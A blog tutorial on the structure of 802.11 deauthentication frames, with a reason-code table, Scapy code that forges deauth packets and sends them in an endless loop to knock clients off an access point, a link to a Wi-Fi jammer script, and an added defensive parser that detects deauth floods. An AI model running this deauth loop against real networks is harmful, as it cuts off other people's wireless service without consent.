Forge and Transmit Deauthentication / Disassociation frames in Scapy

by vault . 05 June 2018


In this tutorial, we are going to walk through the body of an 802.11 deauthentication frame. Our ultimate goal will be to terminate a connection between two stations that are communicating with each other for data transmission. Note that the deauthentication frame is sometimes confused with the disassociation frame. They are not the same, though they share the same structure and the same fields.

If you have ever used aireplay-ng or mdk3, you might have wondered how they are able to disassociate a client from its AP. That is where the disassociation/deauthentication frame comes in. Both of these are management frames, which are not authenticated. Hence, the receiver has no way of knowing who the real originator of the received frame is.

Deauth Frame

Deauth frames are used to terminate a session between two stations. What matters is not who originates the packet but who it is intended for. A station can still make a new connection after the disassociation has been performed. As soon as the packet reaches its destination, the receiver cuts itself off from the sender. Some of the important Dot11 MAC header fields for a deauth frame:

  • type: 0, specifies that it is a management frame (Scapy on Python 2 displays this as 0L)
  • subtype: 12 (0x0c)
  • Destination: the station the packet is destined for.
  • Source: the source station.

Graphical plot of a deauth frame: [image: deauth header]

The deauth frame body comprises three fields:

  1. Reason: a positive integer which specifies the reason.
  2. Vendor Specific Information
  3. 802.11w

Deauth in Scapy

Now, we will transmit some deauthentication frames over the air using Scapy. First of all, we will need Scapy, so install it:

sudo pip install scapy
# OR (Python 3)
sudo pip3 install scapy

Now, launch the Python interactive shell by running the python command:

$ python

Now, getting to the point, we first have to form a deauthentication packet. Import the required layers (and the sendp function) from Scapy and build the deauth packet.

>>> from scapy.layers.dot11 import RadioTap, Dot11, Dot11Deauth
>>> from scapy.sendrecv import sendp

Forging the packet would go like...

>>> pkt = RadioTap() / Dot11(addr1="FF:FF:FF:FF:FF:FF", addr2="FF:FF:FF:FF:FF:FF", addr3="FF:FF:FF:FF:FF:FF") / Dot11Deauth(reason=2)

Note the fields:

  • addr1: MAC address of the client whose connection you want to terminate.
  • addr2: BSSID of the Access Point (AP)
  • addr3: same as addr2

Now, to send the packet:

>>> while True:
...    sendp(pkt, iface="wlan0mon", verbose=False)

Reason Codes

The deauth packet contains a reason field which explains why the connection is being terminated. Here are some of the commonly used reason codes:

Code  Reason
0     Reserved
1     Unspecified reason
2     Previous authentication is no longer valid
3     STA is leaving or has left
4     Disassociated due to inactivity
5     AP is unable to cope with all associated STAs
6     Class 2 frame received from nonauthenticated STA
7     Class 3 frame received from nonassociated STA
8     Sending STA is leaving
9     STA requesting (re)association is not authenticated with responding STA
10    Information in the Power Capability element is unacceptable

So, that is how you can get started with your first script like aireplay-ng. Anyway, here is a captured deauthentication packet in Scapy:

[image: captured deauth packet]

From the highlighted field above, it is clear that the packet was sent from c8:3a:35:55:0c:f0 to the broadcast address, which means every other station connected to the sender. Compared with this, it would be better to specify the target station's address directly, so that the target knows this packet was originated specifically for it and will accept it.
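To show the header layout and reason codes from the defender's side, here is an added example that is not part of the original post or of the WiFiJammer.py script: a minimal parser for the fixed 802.11 MAC header (Frame Control type/subtype, addr1/addr2/addr3, sequence number) and the 2-byte reason code that starts a deauth/disassoc body, plus a simple monitoring check that flags a transmitter sending a burst of deauth/disassoc frames, and any deauth addressed to the broadcast address as in the capture above. The sample frames are constructed hex byte strings (the transmitter address is the one shown in the capture); the window and threshold values are assumptions you would tune for your own environment.

```python
# Added example (not from the original post): decode 802.11 management-frame
# headers and flag deauth/disassoc floods and broadcast deauths in a capture.
import struct
from collections import defaultdict

MGMT_TYPE = 0
DISASSOC_SUBTYPE = 10
DEAUTH_SUBTYPE = 12
BROADCAST = "ff:ff:ff:ff:ff:ff"

# Reason codes as listed in the post (2-byte little-endian field in the body).
REASON_CODES = {
    0: "Reserved",
    1: "Unspecified reason",
    2: "Previous authentication is no longer valid",
    3: "STA is leaving or has left",
    4: "Disassociated due to inactivity",
    5: "AP is unable to cope with all associated STAs",
    6: "Class 2 frame received from nonauthenticated STA",
    7: "Class 3 frame received from nonassociated STA",
    8: "Sending STA is leaving",
    9: "STA requesting (re)association is not authenticated with responding STA",
    10: "Information in the Power Capability element is unacceptable",
}

def mac_str(raw):
    return ":".join(f"{b:02x}" for b in raw)

def parse_dot11(frame):
    """Decode the fixed 24-byte MAC header; for deauth/disassoc frames also
    decode the reason code at the start of the body. Raises on truncation."""
    if len(frame) < 24:
        raise ValueError("frame shorter than an 802.11 MAC header")
    fc0, fc1 = frame[0], frame[1]
    info = {
        "version": fc0 & 0x03,          # Frame Control bits 0-1
        "type": (fc0 >> 2) & 0x03,      # bits 2-3: 0 = management
        "subtype": (fc0 >> 4) & 0x0F,   # bits 4-7: 12 = deauthentication
        "flags": fc1,
        "addr1": mac_str(frame[4:10]),   # receiver
        "addr2": mac_str(frame[10:16]),  # transmitter
        "addr3": mac_str(frame[16:22]),  # BSSID for management frames
        "seq": struct.unpack_from("<H", frame, 22)[0] >> 4,  # drop fragment bits
    }
    if info["type"] == MGMT_TYPE and info["subtype"] in (DEAUTH_SUBTYPE, DISASSOC_SUBTYPE):
        if len(frame) < 26:
            raise ValueError("deauth/disassoc frame missing reason code")
        reason = struct.unpack_from("<H", frame, 24)[0]
        info["reason"] = reason
        info["reason_text"] = REASON_CODES.get(reason, "other/unknown")
    return info

def is_deauth_or_disassoc(info):
    return info["type"] == MGMT_TYPE and info["subtype"] in (DEAUTH_SUBTYPE, DISASSOC_SUBTYPE)

def detect_deauth_abuse(capture, window=1.0, threshold=10):
    """capture: iterable of (timestamp_seconds, raw_frame_bytes).
    Returns one 'flood' alert per transmitter whose peak deauth/disassoc count
    within any `window` seconds reaches `threshold`, and one 'broadcast' alert
    per transmitter that addressed such a frame to ff:ff:ff:ff:ff:ff."""
    times_by_tx = defaultdict(list)
    bcast_by_tx = defaultdict(int)
    for ts, raw in capture:
        try:
            info = parse_dot11(raw)
        except ValueError:
            continue  # truncated or garbage frame: skip rather than crash
        if not is_deauth_or_disassoc(info):
            continue
        times_by_tx[info["addr2"]].append(ts)
        if info["addr1"] == BROADCAST:
            bcast_by_tx[info["addr2"]] += 1
    alerts = []
    for tx, times in times_by_tx.items():
        times.sort()
        start, peak = 0, 0
        for end, t in enumerate(times):          # sliding window over timestamps
            while t - times[start] > window:
                start += 1
            peak = max(peak, end - start + 1)
        if peak >= threshold:
            alerts.append({"kind": "flood", "transmitter": tx, "peak_per_window": peak})
    for tx, n in bcast_by_tx.items():
        alerts.append({"kind": "broadcast", "transmitter": tx, "count": n})
    return sorted(alerts, key=lambda a: (a["kind"], a["transmitter"]))

# Constructed sample frames: FC(2) Duration(2) addr1(6) addr2(6) addr3(6) SeqCtrl(2) [Reason(2)]
DEAUTH_BCAST = bytes.fromhex("c000" "3a01" "ffffffffffff" "c83a35550cf0" "c83a35550cf0" "0000" "0200")
DEAUTH_TARGETED = bytes.fromhex("c000" "3a01" "001122334455" "c83a35550cf0" "c83a35550cf0" "1000" "0300")
BEACON = bytes.fromhex("8000" "0000" "ffffffffffff" "c83a35550cf0" "c83a35550cf0" "2000")

def sample_capture():
    """Constructed capture: a beacon, one targeted deauth, then 20 broadcast
    deauths from the same transmitter inside half a second."""
    cap = [(0.00, BEACON), (0.10, DEAUTH_TARGETED)]
    cap += [(1.0 + i * 0.025, DEAUTH_BCAST) for i in range(20)]
    return cap

if __name__ == "__main__":
    print(parse_dot11(DEAUTH_BCAST))
    for alert in detect_deauth_abuse(sample_capture()):
        print(alert)
```

Because the frames are unauthenticated, the parser can only report what addr2 claims; the detection therefore keys on rate and on broadcast addressing rather than trusting the source, which is exactly the gap that 802.11w management frame protection is meant to close.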

Conclusion

So, we saw the structure of the 802.11 deauthentication packet, and now you should be able to forge your own packet and build something like aireplay or mdk3. Both of these are very powerful tools. I've coded a small script for you to test and read a little deeper yourself. Here's the link on GitHub: maximMole/WiFiJammer.py. The script does a pretty nice job of explaining and collecting nearby wireless networks and forging deauth packets.